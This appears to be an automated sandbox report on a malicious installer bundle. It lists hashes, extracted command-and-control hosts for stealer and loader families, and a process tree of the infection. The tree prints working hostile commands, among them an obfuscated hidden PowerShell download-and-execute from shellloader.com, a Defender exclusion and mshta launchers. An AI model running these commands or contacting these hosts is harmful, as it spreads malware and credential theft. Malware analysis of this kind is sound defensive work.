Analysis
-
max time kernel
80s -
max time network
1892s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
16-09-2021 20:34
General
-
Target
setup_x86_x64_install.exe
-
Size
7.1MB
-
MD5
7b15ff87e11bd9bc7512b41635b68aeb
-
SHA1
3ddf56275a2132a384d251247f38cc086b6db914
-
SHA256
f92cfeb06515f18113a950d5bd569a23cdd85514ef509ccff6c5a4e9a08ca4c7
-
SHA512
d16b63a203a3322ec70f99a7ca692770c45710e2c0d50f24bf027d8d41d579d721e8cf5f20cc95436b1640b821b8efe1a3c617232cdc18c13be0e37431f7baab
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
http://shellloader.com/welcome
Extracted
Family
vidar
Version
40.6
Botnet
706
C2
https://dimonbk83.tumblr.com/
Attributes
-
profile_id
706
Extracted
Family
smokeloader
Version
2020
C2
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
rc4.i32
rc4.i32
Extracted
Family
redline
Botnet
ANI
C2
45.142.215.47:27643
Extracted
Family
redline
Botnet
medianew
C2
91.121.67.60:62102
Extracted
Family
icedid
Campaign
1721901314
Signatures
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 5 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 6 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
-
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
-
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
-
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata: ET MALWARE Win32/Tnega Activity (GET)
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
-
ASPack v2.12-2.42 6 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 60 IoCs
-
Modifies Windows Firewall 1 TTPs
-
VMProtect packed file 3 IoCs
Detects executables packed with VMProtect commercial packer.
-
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 11 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 2 IoCs
Detects Themida, an advanced Windows software protection system.
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 3 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 15 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
Drops file in Program Files directory 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 20 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 18 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 6 IoCs
-
Kills process with taskkill 12 IoCs
-
Script User-Agent 8 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu115049bf2e.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu115049bf2e.exeThu115049bf2e.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\5599974.scr"C:\Users\Admin\AppData\Roaming\5599974.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\6716952.scr"C:\Users\Admin\AppData\Roaming\6716952.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\3567581.scr"C:\Users\Admin\AppData\Roaming\3567581.scr" /S6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\7362389.scr"C:\Users\Admin\AppData\Roaming\7362389.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu11b9fee5fd5b3c.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu11b9fee5fd5b3c.exeThu11b9fee5fd5b3c.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu118764660749a3b.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu118764660749a3b.exeThu118764660749a3b.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu117e9466431bbb9f.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu117e9466431bbb9f.exeThu117e9466431bbb9f.exe /mixone5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 6566⤵
- Drops file in Windows directory
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 6726⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 6846⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 6366⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 8886⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 11006⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu113e650b5e.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu113e650b5e.exeThu113e650b5e.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu11787d2b833e6.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu11787d2b833e6.exeThu11787d2b833e6.exe5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu116d4ab7efb7.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu116d4ab7efb7.exeThu116d4ab7efb7.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu112e5981b78.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu112e5981b78.exeThu112e5981b78.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1160e2804caf.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu1160e2804caf.exeThu1160e2804caf.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3888 -s 15288⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4176 -s 8048⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4176 -s 8288⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4176 -s 8928⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4176 -s 8328⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4176 -s 9648⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4176 -s 10928⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4176 -s 7968⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_v4.exe"C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_v4.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2692 -s 2608⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2692 -s 4808⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2692 -s 4928⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2692 -s 4568⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2692 -s 5008⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\8751723.exe"C:\ProgramData\8751723.exe"8⤵
- Executes dropped EXE
-
C:\ProgramData\3449216.exe"C:\ProgramData\3449216.exe"8⤵
- Executes dropped EXE
-
C:\ProgramData\3449216.exe"C:\ProgramData\3449216.exe"9⤵
-
C:\ProgramData\3449216.exe"C:\ProgramData\3449216.exe"9⤵
-
C:\ProgramData\6215416.exe"C:\ProgramData\6215416.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecMa14.exe"C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecMa14.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\tmpD915_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpD915_tmp.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\tmpD915_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmpD915_tmp.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"7⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5096 -s 15328⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-F3NNQ.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-F3NNQ.tmp\setup_2.tmp" /SL5="$10300,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-HMARC.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-HMARC.tmp\setup_2.tmp" /SL5="$2034E,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
-
C:\Users\Admin\AppData\Local\Temp\is-LHDCJ.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-LHDCJ.tmp\postback.exe" ss111⤵
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe ss112⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"14⤵
-
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\IDHHZaxnQ.dll"13⤵
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\IDHHZaxnQ.dll"14⤵
-
C:\Windows\system32\regsvr32.exe/s "C:\Users\Admin\AppData\Local\Temp\IDHHZaxnQ.dll"15⤵
-
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\IDHHZaxnQ.dllX2WiCclhV.dll"13⤵
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\IDHHZaxnQ.dllX2WiCclhV.dll"14⤵
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1170fdf4c09b1.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu1170fdf4c09b1.exeThu1170fdf4c09b1.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu1170fdf4c09b1.exeC:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu1170fdf4c09b1.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu118c8b4c3885d897d.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu118c8b4c3885d897d.exeThu118c8b4c3885d897d.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1189012621353ba47.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu11f1187a97f50d9c.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1171b1ca5023f5d2.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-BSEJC.tmp\Thu11b9fee5fd5b3c.tmp"C:\Users\Admin\AppData\Local\Temp\is-BSEJC.tmp\Thu11b9fee5fd5b3c.tmp" /SL5="$3002E,138429,56832,C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu11b9fee5fd5b3c.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-E89K8.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-E89K8.tmp\Setup.exe" /Verysilent2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\PDF Reader\PDF Reader\Setup.exe"C:\Program Files (x86)\PDF Reader\PDF Reader\Setup.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\sampason12345.exe"C:\Users\Admin\AppData\Local\Temp\sampason12345.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-F7MC6.tmp\Thu112e5981b78.tmp"C:\Users\Admin\AppData\Local\Temp\is-F7MC6.tmp\Thu112e5981b78.tmp" /SL5="$30030,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu112e5981b78.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-2J2HD.tmp\___YHDG34.exe"C:\Users\Admin\AppData\Local\Temp\is-2J2HD.tmp\___YHDG34.exe" /S /UID=burnerch22⤵
- Executes dropped EXE
-
C:\Program Files\Windows Photo Viewer\LMLDVEFFVM\ultramediaburner.exe"C:\Program Files\Windows Photo Viewer\LMLDVEFFVM\ultramediaburner.exe" /VERYSILENT3⤵
-
C:\Users\Admin\AppData\Local\Temp\is-34EGS.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-34EGS.tmp\ultramediaburner.tmp" /SL5="$502A8,281924,62464,C:\Program Files\Windows Photo Viewer\LMLDVEFFVM\ultramediaburner.exe" /VERYSILENT4⤵
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu5⤵
-
C:\Users\Admin\AppData\Local\Temp\23-c4fc0-a51-b4d9b-d03d9d689fe39\Peshalyfiqu.exe"C:\Users\Admin\AppData\Local\Temp\23-c4fc0-a51-b4d9b-d03d9d689fe39\Peshalyfiqu.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 22564⤵
-
C:\Users\Admin\AppData\Local\Temp\bd-13c28-143-4c3ac-1e78eb0a3d2f5\Pyrexoceshae.exe"C:\Users\Admin\AppData\Local\Temp\bd-13c28-143-4c3ac-1e78eb0a3d2f5\Pyrexoceshae.exe"3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yfhghhfd.d1k\GcleanerEU.exe /eufive & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\yfhghhfd.d1k\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\yfhghhfd.d1k\GcleanerEU.exe /eufive5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\szzlvm2l.e5s\installer.exe /qn CAMPAIGN="654" & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\szzlvm2l.e5s\installer.exeC:\Users\Admin\AppData\Local\Temp\szzlvm2l.e5s\installer.exe /qn CAMPAIGN="654"5⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\szzlvm2l.e5s\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\szzlvm2l.e5s\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631831592 /qn CAMPAIGN=""654"" " CAMPAIGN="654"6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1ujsmmzj.ifu\anyname.exe & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\1ujsmmzj.ifu\anyname.exeC:\Users\Admin\AppData\Local\Temp\1ujsmmzj.ifu\anyname.exe5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ckf42pj4.kma\jg3_3uag.exe & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\ckf42pj4.kma\jg3_3uag.exeC:\Users\Admin\AppData\Local\Temp\ckf42pj4.kma\jg3_3uag.exe5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g0o2tgh1.lil\gcleaner.exe /mixfive & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\g0o2tgh1.lil\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\g0o2tgh1.lil\gcleaner.exe /mixfive5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xu1uopye.gxg\autosubplayer.exe /S & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu118c8b4c3885d897d.exeC:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu118c8b4c3885d897d.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu1170fdf4c09b1.exeC:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu1170fdf4c09b1.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu1171b1ca5023f5d2.exeThu1171b1ca5023f5d2.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\tmp8A78_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp8A78_tmp.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\tmp8A78_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmp8A78_tmp.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu11f1187a97f50d9c.exeThu11f1187a97f50d9c.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\pvrscUurP3aZOoAuPXgzSfJe.exe"C:\Users\Admin\Documents\pvrscUurP3aZOoAuPXgzSfJe.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\J_XEb9uAetGZ8l0vu77r36bZ.exe"C:\Users\Admin\Documents\J_XEb9uAetGZ8l0vu77r36bZ.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"3⤵
-
C:\Users\Admin\Documents\y9iaqrPgJL8KQHzrABokll5_.exe"C:\Users\Admin\Documents\y9iaqrPgJL8KQHzrABokll5_.exe"4⤵
-
C:\Users\Admin\Documents\5BudUgFVj7SjIU6cVKqGBoSH.exe"C:\Users\Admin\Documents\5BudUgFVj7SjIU6cVKqGBoSH.exe"4⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRiPT: closE ( creatEOBJeCT( "WscriPT.shEll"). RUN ("C:\Windows\system32\cmd.exe /C COpy /y ""C:\Users\Admin\Documents\5BudUgFVj7SjIU6cVKqGBoSH.exe"" rOBCqJoQYC.eXe && sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G & iF """" =="""" for %q In (""C:\Users\Admin\Documents\5BudUgFVj7SjIU6cVKqGBoSH.exe"" ) do taskkill -iM ""%~nxq"" /f " , 0 , TrUe ) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C COpy /y "C:\Users\Admin\Documents\5BudUgFVj7SjIU6cVKqGBoSH.exe" rOBCqJoQYC.eXe && sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G& iF "" =="" for %q In ("C:\Users\Admin\Documents\5BudUgFVj7SjIU6cVKqGBoSH.exe" ) do taskkill -iM "%~nxq" /f6⤵
-
C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXeroBCqJOQYC.eXe -P0_6X2fnCLFU6G7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRiPT: closE ( creatEOBJeCT( "WscriPT.shEll"). RUN ("C:\Windows\system32\cmd.exe /C COpy /y ""C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe"" rOBCqJoQYC.eXe && sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G & iF ""-P0_6X2fnCLFU6G"" =="""" for %q In (""C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe"" ) do taskkill -iM ""%~nxq"" /f " , 0 , TrUe ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C COpy /y "C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe" rOBCqJoQYC.eXe && sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G& iF "-P0_6X2fnCLFU6G" =="" for %q In ("C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe" ) do taskkill -iM "%~nxq" /f9⤵
-
